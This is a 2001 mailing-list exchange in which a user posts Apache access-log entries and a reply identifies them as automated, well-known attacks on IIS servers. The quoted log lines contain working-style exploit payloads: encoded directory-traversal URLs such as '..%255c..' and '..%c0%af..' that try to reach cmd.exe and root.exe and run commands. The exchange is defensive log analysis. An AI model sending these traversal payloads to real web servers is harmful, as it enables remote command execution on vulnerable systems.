tomcat-users mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From Herman Stevens <herman.stev...@ubizen.com>
Subject Re: Apache access.log - (whats going on)
Date Wed, 10 Oct 2001 10:25:43 GMT
You are under attack by a hacker (or probably a script kiddie that is using - without too much
knowledge - a script to attack your webserver).  The URLs in your logs are all
well known attacks against an IIS web server.

Lars Nielsen Lind wrote:

> Hi.
>
> I have read my access.log (apache) and found several IP's as shown below. Whats going
on?
>
> /Lars Nielsen Lind
>
> 62.79.14.52 - - [10/Oct/2001:07:44:50 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0"
404 287 "-" "-"
>
> 62.79.14.52 - - [10/Oct/2001:07:44:50 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404
285 "-" "-"
>
> 62.79.14.52 - - [10/Oct/2001:07:44:50 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0"
404 295 "-" "-"
>
> 62.79.14.52 - - [10/Oct/2001:07:44:50 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0"
404 295 "-" "-"
>
> 62.79.14.52 - - [10/Oct/2001:07:44:51 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 309 "-" "-"
>
> 62.79.14.52 - - [10/Oct/2001:07:44:51 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 326 "-" "-"
>
> 62.79.14.52 - - [10/Oct/2001:07:44:51 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 326 "-" "-"
>
> 62.79.14.52 - - [10/Oct/2001:07:44:51 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 342 "-" "-"
>
> 62.79.14.52 - - [10/Oct/2001:07:44:51 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 308 "-" "-"
>
> 62.79.14.52 - - [10/Oct/2001:07:44:51 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 308 "-" "-"
>
> 62.79.14.52 - - [10/Oct/2001:07:44:51 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 308 "-" "-"
>
> 62.79.14.52 - - [10/Oct/2001:07:44:51 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 308 "-" "-"
>
> 62.79.14.52 - - [10/Oct/2001:07:44:52 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 400 292 "-" "-"
>
> 62.79.14.52 - - [10/Oct/2001:07:44:52 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 400 292 "-" "-"
>
> 62.79.14.52 - - [10/Oct/2001:07:44:52 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 309 "-" "-"
>
> 62.79.14.52 - - [10/Oct/2001:07:44:52 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 309 "-" "-"

--

Herman Stevens                Ubizen
Product Trainer               We Secure e-Business
Phone   +32 16 28 70 00       http://www.ubizen.com
Fax     +32 16 28 71 00       http://www.securitywatch.com


Mime
View raw message